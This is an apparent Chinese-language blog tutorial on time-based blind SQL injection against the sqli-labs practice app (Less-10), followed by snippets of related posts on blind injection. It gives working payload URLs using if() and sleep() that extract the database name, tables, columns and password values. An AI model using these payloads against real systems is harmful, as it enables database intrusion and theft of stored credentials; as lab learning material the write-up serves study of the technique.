時間盲注的學習

2021-10-03 21:33:27 字數 1756 閱讀 1366

之前已經學習過了布林盲注,其實時間盲注布林盲注基本上一樣,只不過布林盲注有回顯,而時間盲注沒有,其實時間盲注可以解決多種方法的盲注問題。

sleep()

/延遲函式

if(condition,

true

,false

)//若條件為真 執行true,若條件為假 執行false

substring

("string"

,strart,length)

在這裡就用sqli-labs的第10關講一下

首先判斷注入點

輸入**

發現會延遲10秒出現結果,說明注入點時"。

判斷資料庫長度

//localhost/sqli-labs-master/less-10/?id=1" and if(length(database())>5,1,sleep(10))--+接著爆出資料庫名

//localhost/sqli-labs-master/less-10/?id=1" and if((ascii(substr(database(),1,1)))>120,1,sleep(10))--+接著就更改1的值來爆出來名字。

爆表名

//localhost/sqli-labs-master/less-10/?id=1" and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>120,1,sleep(10))--+和上面的一樣,更改limit 0,1的值來爆出來名字。

和布林盲注相比就是多了乙個if的函式,其他的基本一樣。

爆欄位

//localhost/sqli-labs-master/less-10/?id=1" and if((ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))))>100,1,sleep(10))--+爆值

//localhost/sqli-labs-master/less-10/?id=1" and if((ascii(substr(( select password from users limit 0,1),1,1)))>1,1,sleep(10))--+到這裡就爆出來了,可以用指令碼來進行爆破,由於技術原因就不展示了。

奈何本人技術差,一純手工注入走天下,將來進行指令碼學習再補回來。

SQL盲注 時間盲注,dnslog盲注

時間盲注原理 id get id sql select from users where id id limit 0,1 result mysql query sql row mysql fetch array result if row else 存在sql注入漏洞 然而頁面不會回顯資料,也不會回...

時間盲注手注

基於時間的盲注 時間的概念 使用特定函式讓資料庫去執行,通過自己的設定,來檢視資料庫是否get到我們的請求 函式sleep 設定資料庫的延時或者暫停的時間 函式limit 0,1 限制第乙個的第乙個字元 函式mid 1,1 從第乙個字元開始擷取,只擷取乙個 函式benchmark 引數一,引數二 第...

布林型盲注 時間型盲注

布林型盲注核心思想 利用判斷語句杢證明推測是否正確。推測正確時,頁面正常顯示 錯誤時,頁面異常。盲注的一般步驟 1 求閉合字元 2 求當前資料庫名的長度 3 求當前資料庫名對應的ascii值 4 求表的數量 5 求表名的長度 6 求表名對應的ascii值 7 求列的數量 8 求列名的長度 9 求列名...